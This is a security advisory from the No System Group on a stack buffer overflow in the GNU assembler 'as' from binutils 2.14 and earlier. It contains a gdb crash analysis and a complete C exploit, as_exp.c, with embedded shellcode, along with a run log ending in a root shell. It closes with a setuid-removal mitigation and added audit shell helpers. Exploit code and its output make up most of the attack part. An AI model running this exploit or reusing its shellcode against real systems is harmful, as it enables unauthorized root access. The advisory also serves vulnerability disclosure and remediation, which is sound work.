01 - Stack Buffer Overflow on GNU (assembler) 2.14 and previous, for Linux
No System Group - Advisory #01 - 19/08/03
- Program: as - The GNU assembler
- Homepage: http://sources.redhat.com/binutils/
- Vulnerable Versions: GNU binutils 2.14 and prior
- Risk: Low / Medium
- Impact: Stack Buffer Overflow
DESCRIPTION
The GNU Binutils are a collection of binary tools.
'as' is the GNU assembler.
More information at: http://sources.redhat.com/binutils/
DETAILS
$ /usr/bin/as `perl -e 'print "A" x 2005'`
Segmentation fault
Now we open gdb to see what happened.
$ gdb /usr/bin/as
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA...
..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
esp 0xbffff090 0xbffff090
(gdb)
As the register dump shows, both EBP and EIP have been overwritten with 0x41414141, so the return address is under our control.
ESP at the time of the crash is 0xbffff090; the exploit below uses the stack pointer as the base for its return address.
EXPLOIT
I have done minimal testing on this.
It has been tested on Slackware 9.0 and Red Hat 7.2
------------------- as_exp.c --------------------
/* Linux 'as' buffer overflow
This will give you a root shell if /usr/bin/as is SUID,
which isn't by default.
Use: ./as_exp [offset]
Try offsets 300-400
Tested on Slackware 9.0 and Red Hat 7.2
by CoKi <coki@interlap.com.ar>
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* memcpy, strlen */
#include <unistd.h>   /* execlp */

#define OFFSET 350
#define BUFLEN 2005   /* argument length that crashes 'as' (see DETAILS) */

long esp(void);

int main(int argc, char *argv[]) {
    char buf[BUFLEN + 1];          /* one extra byte for the terminating NUL */
    char shellcode[]=
    "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
    "\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int i, off;
    long ret;

    if(argc>1) {
        off = atoi(argv[1]);
    }
    else off = OFFSET;

    /* guess the return address relative to the current stack pointer */
    ret = (esp() - off);

    printf("\n'as' buffer overflow by CoKi\n");
    printf("----------------------------\n\n");
    printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);

    /* fill the buffer with NOPs (staying inside the buffer), then place the
       return address at the end and the shellcode just before it */
    for(i=0;i+4<=BUFLEN;i+=4)
        *(unsigned long *)&buf[i]=0x90909090;
    *(unsigned long *)&buf[BUFLEN - 4]=ret;
    *(unsigned long *)&buf[BUFLEN - 8]=ret;
    memcpy(buf + BUFLEN - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    buf[BUFLEN] = '\0';           /* execlp expects a NUL-terminated string */

    execlp("/usr/bin/as","as",buf,(char *)NULL);
    perror("execlp");             /* only reached if the exec fails */
    return 1;
}

/* returns the caller's stack pointer: on i386, compiled without
   optimisation, whatever is left in eax is the function's return value */
long esp(void){
    __asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------
$ gcc -o as_exp as_exp.c
$ ./as_exp 390
'as' buffer overflow by CoKi
----------------------------
Return Address: 0xbffff002
Offset: 390
Assembler messages:
Error: can't open ............
.................../bin/sh ..... for reading
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#
This will give you a root shell if /usr/bin/as is SUID, which isn't by default.
SOLUTIONS
Remove the setuid permission from the program if it has it:
# chmod u-s /usr/bin/as
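The following shell helpers are an added example, not part of the original advisory or of binutils: they audit a directory for setuid/setgid binaries, apply the chmod above, and verify that the bit is really gone. The demo at the end works on a constructed temporary directory so that it never touches the real /usr/bin/as.

```shell
#!/bin/sh
# Added example (not from the advisory): audit and verify the
# "remove setuid from as" mitigation. Nothing here is binutils code.

# Print 0 if the file has neither setuid nor setgid set,
# 1 if either bit is set, 2 if the path does not exist.
setuid_status() {
    f="$1"
    [ -e "$f" ] || { echo 2; return 0; }
    if [ -u "$f" ] || [ -g "$f" ]; then
        echo 1
    else
        echo 0
    fi
}

# List regular files directly inside a directory that carry
# setuid or setgid (POSIX test(1) only, so it works without GNU find).
list_setuid_files() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if [ -u "$f" ] || [ -g "$f" ]; then
            echo "$f"
        fi
    done
}

# Strip setuid and setgid from a file and confirm the change took effect.
# Returns 0 only if both bits are clear afterwards.
strip_setuid() {
    chmod u-s,g-s "$1" && [ "$(setuid_status "$1")" = 0 ]
}

# Demo on a constructed directory (a fake 'as' with the setuid bit set):
#   demo=$(mktemp -d); touch "$demo/as"; chmod 4755 "$demo/as"
#   list_setuid_files "$demo"      # prints "$demo/as"
#   strip_setuid "$demo/as" && echo "setuid removed from $demo/as"
#   rm -rf "$demo"
```

Run `list_setuid_files /usr/bin` to see what on a real system is currently setuid; for the advisory's case the expectation is that `/usr/bin/as` does not appear, and `strip_setuid /usr/bin/as` (as root) both removes the bit and fails loudly if the change did not stick.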
REFERENCES
http://www.nosystem.com.ar/advisories/advisory-01.txt
CREDITS
Discovered by CoKi <coki@interlap.com.ar>
No System Group - http://www.nosystem.com.ar